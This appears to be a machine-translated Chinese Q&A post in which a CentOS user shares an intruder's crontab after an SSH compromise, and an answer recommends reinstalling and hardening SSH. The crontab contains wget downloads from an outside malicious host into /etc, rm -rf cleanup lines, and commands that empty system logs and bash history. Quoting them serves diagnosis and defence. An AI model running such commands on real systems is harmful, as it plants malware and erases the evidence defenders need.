我相信有人/病毒在我的CentOS中入侵了,我最近开了一天SSH。盒子在局域网中。当我在外面时,我只需要使用它一段时间。
那天晚上,Linux在局域网中通过SSH访问变得很慢,而且打开任何本地网页都很慢。这很奇怪。我检查CPU有时非常高。所以我检查了crontab。它已经改变了。
有很多这样的东西:
20 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
我可以看到我的/ etc /文件夹现在有很多像这样的红色文件夹
srwsrwt 1 root root 1524643 Jan 31 21:06 atdd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 atddd
srwsrwt 1 root root 1258750 Nov 24 14:22 cupsdd
-rwsrwsrwt 1 root root 1258750 Nov 24 14:22 cupsddd
srwsrwt 1 root root 1524643 Jan 31 21:06 ksapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 ksapdd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 kysapdd
srwsrwt 1 root root 1524643 Jan 10 20:06 sksapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:07 sksapdd
-rwsrwsrwt 1 root root 1524643 Oct 24 04:55 skysapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:07 skysapdd
srwsrwt 1 root root 1524643 Feb 5 17:26 xfsdx
-rwsrwsrwt 1 root root 1524643 Feb 5 17:26 xfsdxd
发生什么事了?我该怎么办?
答案 0 :(得分:2)
一旦发生这样的事情,只有完全重新安装机器才能解决问题..特别是如果那是root用户的crontab文件。
如果您真的想看看这个人如何进入,如果他们没有植入根工具包,那么您可以查看 / var / log / secure 等日志并查找 sshd 条目。
但如果您的root用户遭到入侵,那么唯一有意义的就是完全重新安装。
将来,您可以通过执行以下智能操作来最小化ssh访问问题:
不允许通过ssh进行密码登录...仅允许基于密钥的登录。这意味着只有在个人资料中拥有正确私钥的人才能登录。
不允许直接root登录(即使使用密钥)并要求所有root访问权限都通过sudo完成。然后,您可以通过安全日志确定哪些用户已使用root访问权限。
如果可能,请通过iptables将打开的sshd端口限制为一系列源IP收件人,而不是对所有人开放。
将SSHD设置为从外部侦听另一个端口而不是22(您可以非常轻松地侦听端口22和另一个端口)。此步骤不会阻止正在主动扫描ssh端口的人,但会阻止仅查看端口22的自动扫描。
您可能还会考虑设置一个需要共享证书才能连接到整个LAN的VPN。 OpenVPN是一种方法。许多路由器也可以这样做。然后,您可以通过VPN访问您的LAN,而不是将每个服务器直接暴露给Internet。